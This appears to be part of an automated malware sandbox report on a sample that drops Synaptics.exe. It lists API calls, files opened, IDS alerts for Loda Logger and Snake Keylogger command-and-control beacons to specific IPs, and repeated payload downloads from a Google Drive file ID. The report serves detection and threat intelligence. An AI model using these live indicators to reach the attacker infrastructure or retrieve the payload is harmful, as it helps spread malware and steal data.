Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_00A024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_00A024A9
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_009F6B3F
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_009F6E4A
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_009FF350
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009CDD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_009CDD92
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_009FFDD2
Source: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe | Code function: 9_2_009FFD47 FindFirstFileW,FindClose,9_2_009FFD47
Source: C:\Users\user\Desktop\AYRASY.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\AYRASY.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\Desktop\AYRASY.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\AYRASY.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Users\user\Desktop\AYRASY.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: excel.exeMemory has grown: Private usage: 1MB later: 67MB

                                Networking

                                Source: Network traffic | Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.6:49759 -> 172.111.138.100:5552
                                Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49759 -> 172.111.138.100:5552
                                Source: Network traffic | Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.6:49796 -> 69.42.215.252:80
                                Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49850 -> 172.111.138.100:5552
                                Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49923 -> 172.111.138.100:5552
                                Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:49979 -> 172.111.138.100:5552
                                Source: Network traffic | Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.6:50039 -> 172.111.138.100:5552
                                Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50039 -> 172.111.138.100:5552
                                Source: Network traffic | Suricata IDS: 2830912 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon Response M2 : 172.111.138.100:5552 -> 192.168.2.6:50039
                                Source: Network traffic | Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.6:50037 -> 172.111.138.100:5552
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49802 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49786 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49785 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49803 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49836 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49813 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49825 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49824 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49845 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49852 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49859 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49861 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49816 -> 142.250.186.46:443
                                Source: Network traffic | Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49867 -> 142.250.186.46:443
                                Source: Malware configuration extractor | URLs: xred.mooo.com
                                Source: unknown | DNS query: name: freedns.afraid.org
                                Source: Joe Sandbox View | IP Address: 172.111.138.100
                                Source: Joe Sandbox View | IP Address: 69.42.215.252
                                Source: Joe Sandbox View | ASN Name: VOXILITYGB
                                Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | TCP traffic detected without corresponding DNS query: 172.111.138.100
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Users\user\Desktop\._cache_AYRASY.exe | Code function: 2_2_001C550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_001C550C
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
                                Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=BYMo-wv4eYJdWmry7AUwgnY8FD94uo3veWkAXjfZOk1mv7TJVBgEhqFHCgX6R2JeKOBvo50nIjRpzf2b_9A2GW8ksEyt-5g4q85Ob8tsU_aR9mcINLgHh64rG-oKyQGbjBH7KUvXgliKdHc4uXAnoj7xbO6TIXqQNfde8w3K2uPd4t-_pCWMMPI
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=Y_PNLw8RAdUj4J1fOerPMq8Ej9LvL1f7eF6_piOgXJNptBE8qxvPOkddsBqHD9gQOeCrJToQuet-_tokPg-JdZJiqyAu88gCyYeyuE48kpaD4y1_QnonBLTPPkt56ERiisqn6OfLmXRqnXEdx-shuyT3q60FEk5q_r3UTpHE8-DK_GE5EajAs4Vr
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                Source: global traffic | HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive | Cookie: NID=520=GbM711qpEqJ6-vJ7oZqwt_WizODnySwytzMLs5JRcON8kGsz8pvZs1ucuzlzIIEVOcZGVhhVTYf4xlXyHI5Juf1ww77K6Oa5Bm_YSz4X14o3A_uSVZ8VL5euu7xS6ZroCu0UPyI9Ne-wNNv9n_H8Nqd8MjC5G5YX2-l3dDYf59wDf8Q1VbXIrls
                                Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache
                                Source: global traffic | HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 | User-Agent: MyApp | Host: freedns.afraid.org | Cache-Control: no-cache
                                Source: Synaptics.exe, 00000003.00000003.2356535180.0000000005605000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: *.google.com*.appuser.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be equals www.youtube.com (Youtube)
                                Source: Synaptics.exe, 00000003.00000003.2337108577.0000000005602000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: *.google.com*.appuser.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                                Source: Synaptics.exe, 00000003.00000003.2337108577.00000000055E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                                Source: Synaptics.exe, 00000003.00000002.2441515499.0000000005600000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: om*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cn equals www.youtube.com (Youtube)
                                Source: global traffic | DNS traffic detected: DNS query: docs.google.com
                                Source: global traffic | DNS traffic detected: DNS query: xred.mooo.com
                                Source: global traffic | DNS traffic detected: DNS query: freedns.afraid.org
                                Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | X-GUploader-UploadID: AFiumC4KlaZQ4n-XKMdW1aWpbAFMRpXtf-mXTavBuLeS7kh3Xpl8Tu7eBCs4dvenupWm320k | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Mon, 30 Dec 2024 10:24:24 GMT | P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Content-Security-Policy: script-src 'report-sample' 'nonce-Zlj0acJSHkIHNfrDRTNwgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Cross-Origin-Opener-Policy: same-origin | Content-Length: 1652 | Server: UploadServer | Set-Cookie: NID=520=BYMo-wv4eYJdWmry7AUwgnY8FD94uo3veWkAXjfZOk1mv7TJVBgEhqFHCgX6R2JeKOBvo50nIjRpzf2b_9A2GW8ksEyt-5g4q85Ob8tsU_aR9mcINLgHh64rG-oKyQGbjBH7KUvXgliKdHc4uXAnoj7xbO6TIXqQNfde8w3K2uPd4t-_pCWMMPI; expires=Tue, 01-Jul-2025 10:24:24 GMT; path=/; domain=.google.com; HttpOnly | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
                                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | X-GUploader-UploadID: AFiumC7NffQA0sK6LlEYaFFQ7Ze0jEZ5-g3-HNlxD8dVcfnhVBVgP_ShdHb7zvTRGAe23PV3b7oa4L0 | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Mon, 30 Dec 2024 10:24:24 GMT | P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." | Cross-Origin-Opener-Policy: same-origin | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Content-Security-Policy: script-src 'report-sample' 'nonce-WqdjAfbOEyvViiWfNKNokA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=* | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version | Content-Length: 1652 | Server: UploadServer | Set-Cookie: NID=520=Y_PNLw8RAdUj4J1fOerPMq8Ej9LvL1f7eF6_piOgXJNptBE8qxvPOkddsBqHD9gQOeCrJToQuet-_tokPg-JdZJiqyAu88gCyYeyuE48kpaD4y1_QnonBLTPPkt56ERiisqn6OfLmXRqnXEdx-shuyT3q60FEk5q_r3UTpHE8-DK_GE5EajAs4Vr; expires=Tue, 01-Jul-2025 10:24:24 GMT; path=/; domain=.google.com; HttpOnly | Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 | Content-Security-Policy: sandbox allow-scripts | Connection: close
